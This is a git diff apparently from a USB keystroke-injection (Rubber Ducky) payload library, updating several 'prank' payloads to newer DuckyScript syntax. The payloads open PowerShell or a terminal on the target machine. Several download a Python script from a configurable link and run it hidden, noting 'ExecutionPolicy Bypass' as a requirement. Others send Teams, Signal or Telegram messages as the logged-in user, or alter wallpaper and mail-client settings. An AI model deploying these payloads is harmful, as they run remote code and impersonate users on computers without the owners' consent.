+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 1500
REM Create the file
-STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
+STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
REM Write the code into the file
-STRING Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
-ENTER
+STRINGLN Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
DELAY 1000
REM Execute the Python script
-STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
-ENTER
+STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
REM Close the PowerShell
DELAY 1000
diff --git a/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt b/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt
index 704dd3f0e..151a556bc 100644
--- a/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt
+++ b/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt
@@ -1,36 +1,72 @@
-REM ######################################################
-REM # |
-REM # Title : Change Wallpaper With Screenshot |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ######################################################
+REM_BLOCK
+######################################################
+# #
+# Title : Change Wallpaper With Screenshot #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+######################################################
+Requirements:
+ - Internet Connection
+ - ExecutionPolicy Bypass
+ - Python
+END_REM
-REM Requirements:
-REM - Internet Connection
-REM - ExecutionPolicy Bypass
-REM - Python
+REM REQUIRED - Set your Python script link
+DEFINE #SCRIPT-PY-LINK example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
-REM REQUIRED - Set your Python script link
-DEFINE SCRIPT-PY-LINK example.com
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
-
-STRING Invoke-WebRequest -Uri "
-STRING SCRIPT-PY-LINK
-STRING " -OutFile "script.py"
-ENTER
+STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 2000
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
diff --git a/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt b/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt
index 3158172bd..2305c40b2 100644
--- a/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt
+++ b/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt
@@ -1,39 +1,58 @@
-REM ###########################################
-REM # |
-REM # Title : Change Desktop Wallpaper |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Linux (KDE based) |
-REM # |
-REM ###########################################
-
-REM Requirements:
-REM - Internet Connection
-
-DELAY 1000
-CTRL-ALT t
-DELAY 2000
+REM_BLOCK
+###########################################
+# #
+# Title : Change Desktop Wallpaper #
+# Author : Aleff #
+# Version : 1.1 #
+# Category : Prank #
+# Target : Linux (KDE based) #
+# #
+###########################################
+
+Requirements:
+ - Internet Connection
+END_REM
REM Replace 'example.com/IMAGE_NAME' with your image link
-DEFINE IMAGE_LINK example.com/IMAGE_NAME
-STRING wget
-STRING IMAGE_LINK
-ENTER
+DEFINE #IMAGE_LINK example.com/IMAGE_NAME
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
-DEFINE IMAGE_PATH="file://example.jpg"
+DEFINE #IMAGE_PATH="file://example.jpg"
-REM It depends by the Internet Connection
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
+CTRL-ALT t
DELAY 2000
-STRING qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
STRINGLN (New-Object -ComObject WScript.Shell).SendKeys("{F11}")
diff --git a/payloads/library/prank/Full-ScreenBannerJoke/payload.txt b/payloads/library/prank/Full-ScreenBannerJoke/payload.txt
index b6bc9030f..e304170b2 100644
--- a/payloads/library/prank/Full-ScreenBannerJoke/payload.txt
+++ b/payloads/library/prank/Full-ScreenBannerJoke/payload.txt
@@ -1,36 +1,73 @@
+REM_BLOCK
+############################################
+# #
+# Title : Full-Screen Banner Joke #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+############################################
-REM ############################################
-REM # |
-REM # Title : Full-Screen Banner Joke |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ############################################
+Requirements:
+ - Internet Connection
+ - Python installed
+ - ExecutionPolicy Bypass
+END_REM
-REM Requirements:
-REM - Internet Connection
-REM - Python installed
-REM - ExecutionPolicy Bypass
+REM REQUIRED - Set your Python script link
+DEFINE #SCRIPT-PY-LINK example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
-REM REQUIRED - Set your Python script link
-DEFINE SCRIPT-PY-LINK example.com
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
-STRING Invoke-WebRequest -Uri "
-STRING SCRIPT-PY-LINK
-STRING " -OutFile "script.py"
-ENTER
+STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
diff --git a/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt b/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt
index d3c0e85c1..1ea18b09e 100644
--- a/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt
+++ b/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt
@@ -1,29 +1,69 @@
-REM ##################################################
-REM # |
-REM # Title : Play A Song Through Spotify |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ##################################################
+REM_BLOCK
+##################################################
+# #
+# Title : Play A Song Through Spotify #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+##################################################
+Requirements:
+ - Internet Connection
+ - Spotify installed and user logged-in
+ - ExecutionPolicy Bypass
+END_REM
-REM Requirements:
-REM - Internet Connection
-REM - Spotify installed and user logged-in
-REM - ExecutionPolicy Bypass
+REM REQUIRED - Set your song name
+DEFINE #SONG-NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
-REM REQUIRED - Set your song name
-DEFINE SONG-NAME example
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
STRINGLN Start-Process "spotify://"
@@ -43,8 +83,7 @@ REM Some times popups of advertisements may come out and usually they will click
REM ESCAPE
REM DELAY 500
-STRING SONG-NAME
-ENTER
+STRINGLN #SONG-NAME
DELAY 1000
TAB
DELAY 500
diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
index 3712631f5..9b5b0edec 100644
--- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
+++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
@@ -1,12 +1,14 @@
-REM #####################################################
-REM # #
-REM # Title : Prank In The Middle - Thunderbird #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Prank #
-REM # Target : Windows 10/11 #
-REM # #
-REM #####################################################
+REM_BLOCK
+#####################################################
+# #
+# Title : Prank In The Middle - Thunderbird #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+#####################################################
+END_REM
EXTENSION DETECT_READY
REM VERSION 1.1
@@ -38,8 +40,7 @@ END_EXTENSION
REM Open Thunderbird and goto settings
GUI r
-STRING thunderbird
-ENTER
+STRINGLN thunderbird
DELAY 1000
REPEAT 4 TAB
ENTER
@@ -70,8 +71,7 @@ DELAY 500
REM Open the powershell and goto the directory
GUI r
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 1500
STRING cd
DELAY 500
diff --git a/payloads/library/prank/SendMessagesInTeams/payload.txt b/payloads/library/prank/SendMessagesInTeams/payload.txt
index 3ff4497e9..0212ff986 100644
--- a/payloads/library/prank/SendMessagesInTeams/payload.txt
+++ b/payloads/library/prank/SendMessagesInTeams/payload.txt
@@ -1,37 +1,82 @@
-REM ###########################################
-REM # |
-REM # Title : Send Messages In Teams |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###########################################
-
-REM Requirements:
-REM - Microsoft Teams installed and user logged-in
-REM - Internet Connection
-REM - ExecutionPolicy Bypass
-REM - Python
-
-REM 1. Open a powershell
-REM 2. Close if Teams is opens and reopen it
-REM 3. Goto search bar
-REM 4. Search the person by name, email, id or what you want...
-REM 5. Downarrow and enter to open the chat
+REM_BLOCK
+###########################################
+# #
+# Title : Send Messages In Teams #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+###########################################
+
+Requirements:
+ - Microsoft Teams installed and user logged-in
+ - Internet Connection
+ - ExecutionPolicy Bypass
+ - Python
+
+1. Open a powershell
+2. Close if Teams is opens and reopen it
+3. Goto search bar
+4. Search the person by name, email, id or what you want...
+5. Downarrow and enter to open the chat
+END_REM
REM REQUIRED - Name, email, id or what you want for contact the target
-DEFINE USER-ID example
+DEFINE #USER-ID example
+
REM REQUIRED - Messages
-DEFINE MESSAGE1 example
+DEFINE #MESSAGE1 example
+
REM ...
-REM DEFINE MESSAGEN example..
+REM DEFINE #MESSAGEN example..
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
REM #### Powershell ####
@@ -44,8 +89,7 @@ DELAY 10000
REM #### Teams ####
CTRL N
DELAY 2000
-STRING USER-ID
-ENTER
+STRINGLN #USER-ID
DELAY 2000
TAB
DELAY 1000
@@ -53,11 +97,10 @@ TAB
DELAY 1000
REM #### Messages ####
-STRING MESSAGE1
-ENTER
+STRINGLN #MESSAGE1
DELAY 1000
REM ...
-REM STRINGLN MESSAGEN
+REM STRINGLN #MESSAGEN
DELAY 500
ALT F4
diff --git a/payloads/library/prank/SendSignalMessages/payload.txt b/payloads/library/prank/SendSignalMessages/payload.txt
index 71c526368..95bee7225 100644
--- a/payloads/library/prank/SendSignalMessages/payload.txt
+++ b/payloads/library/prank/SendSignalMessages/payload.txt
@@ -1,41 +1,83 @@
-REM #########################################
-REM # |
-REM # Title : Send Signal Messages |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank, Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM #########################################
-
-REM Requirements:
-REM - Internet Connection
-REM - Signal App installed
-REM Payload Plug-And-Play but can be edited as you want the message
+REM_BLOCK
+#########################################
+# #
+# Title : Send Signal Messages #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank, Execution #
+# Target : Windows 10-11 #
+# #
+#########################################
+
+Requirements:
+ - Internet Connection
+ - Signal App installed
+Payload Plug-And-Play but can be edited as you want the message
+END_REM
REM REQUIRED - Receiver number
-DEFINE NUMBER 3332211000
+DEFINE #NUMBER 3332211000
REM REQUIRED - Message to send
-DEFINE MESSAGE YOUR_MESSAGE
+DEFINE #MESSAGE example
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
-STRING Stop-Process -Name "Signal"
-ENTER
-STRING Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
-ENTER
+STRINGLN Stop-Process -Name "Signal"
+DELAY 500
+STRINGLN Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
DELAY 5000
TAB
TAB
TAB
ENTER
DELAY 100
-STRING NUMBER
+STRING #NUMBER
DELAY 100
TAB
DELAY 100
@@ -44,8 +86,7 @@ DELAY 200
REM This is the message that will be sent.
REM You can change it as you want, if you want.
-STRING YOUR_MESSAGE
-ENTER
+STRINGLN #MESSAGE
REM Closing Signal App
DELAY 500
diff --git a/payloads/library/prank/SendTelegramMessages_Linux/payload.txt b/payloads/library/prank/SendTelegramMessages_Linux/payload.txt
index 10ab2b362..0d057ed32 100644
--- a/payloads/library/prank/SendTelegramMessages_Linux/payload.txt
+++ b/payloads/library/prank/SendTelegramMessages_Linux/payload.txt
@@ -1,37 +1,64 @@
-
-REM #########################################
-REM # |
-REM # Title : Send Telegram Messages |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Linux |
-REM # |
-REM #########################################
-
-REM Requirements:
-REM - Internet Connection
-REM - telegram-desktop installed and activated
-
-DELAY 1000
+REM_BLOCK
+#########################################
+# #
+# Title : Send Telegram Messages #
+# Author : Aleff #
+# Version : 1.1 #
+# Category : Prank #
+# Target : Linux #
+# #
+#########################################
+
+Requirements:
+ - Internet Connection
+ - telegram-desktop installed and activated
+END_REM
+
+REM Define the message receiver username
+DEFINE #USERNAME @example
+
+REM Define the message(s)
+DEFINE #MESSAGE1 example
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-STRING telegram-desktop
-ENTER
+STRINGLN telegram-desktop
REM It depends by the computer...
DELAY 3000
-REM Define the message receiver username
-DEFINE USERNAME @example
-STRING USERNAME
-ENTER
+STRINGLN #USERNAME
DELAY 500
-REM Define the message(s)
-DEFINE MESSAGE1 example
-STRING MESSAGE1
-ENTER
+STRINGLN #MESSAGE1
DELAY 500
REM other messages here...
REM ...
diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
index 9abbe927f..8c4fa422f 100644
--- a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
+++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
@@ -1,33 +1,70 @@
-REM ############################################
-REM # |
-REM # Title : The Mouse Moves By Itself |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10/11 |
-REM # |
-REM ############################################
+REM_BLOCK
+############################################
+# #
+# Title : The Mouse Moves By Itself #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+############################################
+Requirements:
+ - Internet Connection
+END_REM
-REM Requirements:
-REM - Internet Connection
+REM REQUIRED - Set your Python script link
+DEFINE #SCRIPT-PY-LINK example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
-REM REQUIRED - Set your Python script link
-DEFINE SCRIPT-PY-LINK example.com
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
-STRING Invoke-WebRequest -Uri "
-STRING SCRIPT-PY-LINK
-STRING " -OutFile "script.py"
-ENTER
+STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
diff --git a/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt b/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt
index e6ee5abb5..c2f036fce 100644
--- a/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt
+++ b/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt
@@ -1,15 +1,18 @@
-REM ############################################################
-REM # #
-REM # Title : This damn shell doesn't work, SO SAD! :C #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Prank #
-REM # Target : Linux #
-REM # #
-REM ############################################################
-
-REM Requirements:
-REM - Nothing <3
+REM_BLOCK
+############################################################
+# #
+# Title : This damn shell doesn't work, SO SAD! :C #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Linux #
+# #
+############################################################
+
+Requirements:
+ - Nothing <3
+END_REM
+
REM With Kali Linux 2020.4, the new default shell is now ZSH for users who install the distribution.
DEFINE #TARGET_KALI_LINUX TRUE
diff --git a/payloads/library/prank/Try_To_Catch_Me/payload.txt b/payloads/library/prank/Try_To_Catch_Me/payload.txt
index d9eb8e7a0..84d591e76 100644
--- a/payloads/library/prank/Try_To_Catch_Me/payload.txt
+++ b/payloads/library/prank/Try_To_Catch_Me/payload.txt
@@ -1,27 +1,26 @@
-REM ####################################
-REM # |
-REM # Title : Try To Catch Me |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10/11 |
-REM # |
-REM ####################################
+REM_BLOCK
+####################################
+# #
+# Title : Try To Catch Me #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+####################################
-
-REM Requirements:
-REM - Python
-REM - Internet Connection
+Requirements:
+ - Python
+ - Internet Connection
+END_REM
REM REQUIRED - Set your Python script link
DEFINE #SCRIPT-PY-LINK example.com
-
DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"